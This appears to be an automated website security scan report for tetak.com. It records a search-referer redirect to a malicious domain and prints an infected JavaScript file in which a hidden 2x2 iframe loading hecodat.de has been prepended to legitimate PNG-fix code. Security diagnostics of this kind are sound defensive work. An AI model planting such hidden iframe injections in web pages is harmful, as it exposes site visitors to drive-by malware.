Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://tetak.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: tetak.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Wed, 03 Sep 2014 02:29:23 GMT Location: http://hecodat.de/zwmd.html?h=931129 Server: Apache Content-Length: 279 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://tetak.com/ | 200 OK Content-Length: 41745 Content-Type: text/html | clean |
http://tetak.com/iepngfix_tilebg.js | 200 OK Content-Length: 3826 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=931129></iframe>');
if (!window.IEPNGFix) { window.IEPNGFix = {}; }
IEPNGFix.tileBG = function(elm, pngSrc, ready) {
var data = this.data[elm.uniqueID],
elmW = Math.max(elm.clientWidth, elm.scrollWidth),
elmH = Math.max(elm.clientHeight, elm.scrollHeight),
bgX = elm.currentStyle.backgroundPositionX,
if (elm.firstChild) { elm.insertBefore(d, elm.firstChild); } else { elm.appendChild(d); } }
this.fix(d, pngSrc, 0); count++; } } }
while (count < tiles.cache.length) { this.fix(tiles.cache[count], '', 0); tiles.cache[count++].style.display = 'none'; }
this.hook.enabled = 1;
tiles.old = { w: elmW, h: elmH, x: bgX, y: bgY, r: bgR };
};
Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://hecodat.de/zwmd.html?j=931129
<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=931129>
http://mwximage.com/327864.js | 404 Not Found Content-Length: 19 Content-Type: text/html | clean |
http://mwximage.com/test404page.js | 404 Not Found Content-Length: 19 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=tetak.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://tetak.com/
Result: tetak.com is not infected or malware details are not published yet.